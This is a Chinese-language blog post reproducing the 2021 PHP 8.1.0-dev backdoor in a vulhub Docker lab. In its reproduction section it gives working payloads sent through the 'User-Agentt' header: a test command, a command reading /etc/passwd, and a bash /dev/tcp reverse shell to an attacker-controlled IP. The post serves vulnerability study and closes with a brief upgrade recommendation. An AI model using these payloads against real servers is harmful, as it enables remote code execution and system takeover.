美文网首页
PHP-8.1.0-dev 后门命令执行漏洞复现

PHP-8.1.0-dev 后门命令执行漏洞复现

作者: 5f4120c4213b | 来源:发表于2021-06-16 14:42 被阅读0次

    0x00漏洞描述

    PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。

    0x01影响范围

    PHP 8.1.0-dev

    0x02环境搭建

    1、本次环境搭建使用vulhub中的docker环境搭建,vulhub环境下载地址:

    https://github.com/vulhub/vulhub

    2、下载完成后发送到安装有docker和docker-compose环境的虚拟机中,进入漏洞环境目录

    cd vulhub-master/php/8.1-backdoor/

    image1.png

    3、使用以下命令启动漏洞环境

    docker-compose up -d

    image2.png

    4、启动完成后在浏览器访问以下地址出现Hello world表示搭建成功

    http://your-ip:8080/

    image

    0x03漏洞复现

    1、访问漏洞页面,然后打开Burp抓取首页的包并发送到Repeater(重放)模块

    image4.png

    2、在数据包中添加User-Agentt: 字段并在后面添加上测试漏洞poc:

    zerodiumvar_dump(3*7);

    image5.png

    3、将字段后面poc修改为zerodiumsystem("cat /etc/passwd");读取文件

    image

    4、修改payload执行反弹shell,打开一台kali并设置监听,将poc修改为以下反弹shell的poc

    zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/172.16.1.151/6678 0>&1'");

    image7.png

    0x04修复建议

    1、建议升级或安装相应补丁

    参考链接:

    https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor

    相关文章

      网友评论

          本文标题:PHP-8.1.0-dev 后门命令执行漏洞复现

          本文链接:https://www.haomeiwen.com/subject/jfaxyltx.html